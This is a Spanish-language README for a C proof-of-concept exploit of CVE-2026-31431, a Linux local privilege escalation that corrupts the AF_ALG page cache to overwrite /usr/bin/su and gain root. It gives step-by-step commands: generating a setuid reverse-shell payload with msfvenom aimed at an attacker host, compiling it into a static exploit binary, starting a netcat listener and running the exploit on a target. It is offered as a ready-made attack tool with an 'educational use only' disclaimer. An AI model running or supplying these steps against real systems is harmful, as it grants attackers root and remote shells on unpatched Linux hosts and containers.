
PoC en C para CVE-2026-31431, una escalada de privilegios local (LPE) en Linux sin privilegios que explota la corrupción de la caché de páginas de AF_ALG para sobrescribir /usr/bin/su y obtener acceso root.
Escalada de privilegios local (LPE) trivial sin privilegios escribiendo 4 bytes controlados en la caché de páginas de cualquier archivo legible mediante un fallo lógico en AF_ALG (kernel 4.14 → principios de 2026).
Corrompe /usr/bin/su en memoria y luego ejecútalo → root.

# 1. Genera un payload ELF (ejemplo de shell reversa)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> PrependSetuid=true \
PrependSetgid=true -f elf -a x86 --platform linux -o payload_x86
# 2. Compila (estático, sin símbolos, payload incrustado vía .incbin)
gcc -m32 -static -Wl,--strip-all -DPAYLOAD_FILE=payload_x86 -o copy_fail_x86 copy_fail.c
# 3. Inicia primero el listener (nc -lvp <LPORT>) y luego ejecuta el exploit en el host objetivo
./copy_fail_x86
• CVE: CVE-2026-31431 • CVSS: 7.8 • Parche: commit a664bf3d603d
• Funciona en prácticamente todas las distribuciones Linux 2017–2026 (incluidos contenedores).
• Técnica: abre /usr/bin/su con O_RDONLY, abusa del descifrado in-place de AEAD para insertar un payload manipulado directamente en la caché de páginas, omitiendo el VFS.
• Divulgación original y PoC en Python de 732 bytes → https://copy.fail
MIT – consulta LICENSE. Solo con fines educativos o pruebas autorizadas. Úsalo bajo tu propio riesgo.